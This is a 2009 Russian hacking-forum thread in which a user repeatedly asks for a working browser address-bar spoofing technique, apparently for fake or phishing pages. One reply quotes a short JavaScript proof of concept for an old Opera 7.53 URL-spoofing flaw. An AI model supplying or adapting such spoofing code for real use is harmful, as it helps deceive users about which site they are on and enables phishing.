Подмена адреса!

Discussion in 'Уязвимости' started by kapadult, 8 Jan 2009.

  1. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Люди, кто-нибудь знает РАБОЧИЙ метод подмены адресной строки (хотя бы в IE)??? Знаю, что вроде сейчас проканывает метод с attack.js, но я не очень-то врубаюсь как им нормально воспользоваться... Короче, буду ОЧЕНЬ благодарен за помощь...
     
  2. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Люди, ПОЗАРЕЗ нужно! Что никто не в теме??? :(
     
  3. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Объясни что значит attacj.js, выложи или ссылку в студию.
     
  4. Astn

    Astn New Member

    Joined:
    24 Jun 2008
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Как я понял перенаправления чтоль адреса?
     
  5. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Чтобы в адресной строке был один адрес, а страница отображалась другая... Спуфинг так называемый...
     
  6. Astn

    Astn New Member

    Joined:
    24 Jun 2008
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    а всё понял, тока для чего тебе ето? и есть много статей про ето, "web програмирование"
     
  7. GrinGoO

    GrinGoO Elder - Старейшина

    Joined:
    1 Jul 2008
    Messages:
    98
    Likes Received:
    95
    Reputations:
    -1
    Программа: Opera Web Browser 7.53, Build 3850

    Уязвимость в Web браузере Opera в обработке javascript позволяет удаленному пользователю создать HTML, который подделает URL в адресной строке. Удаленный пользователь может создать HTML, содержащий javascript, который, когда будет загружен, отобразить другой URL в адресной строке.

    Пример:

    [script]
    function fake() {
    oc=window.open('http://www.opera.com/', '','location=1');
    oc.location.replace('http://www.example.com');
    }
    [/script]
    [a href="javascript:void(0);" onClick="fake()"]http://www.opera.com/[/a]


    Источник: Xakep.ru

    Не понял что тебе конкретно нужно.. ну вот что то нашёл.
     
  8. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Спасибо это то что надо!!! Но, мне бы такой баг на IE....
     
  9. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    Для фейков батенька, для фейков?
     
  10. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    А вот и нет! :) Для личных целей...попонтаваться так сказать... Вообщем не важно, меня уже просто вообще заинтриговала как такую фишку можно провернуть?! И МОЖНО ЛИ?
     
  11. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Так кто-нибудь знает как это осуществить???
     
  12. kapadult

    kapadult New Member

    Joined:
    3 Jan 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Если не хотите в паблик, то [email protected]. Не подскажите - пойду вешаться..... :)
     
  13. Dark Psycho

    Dark Psycho New Member

    Joined:
    16 Feb 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    тема еще жива?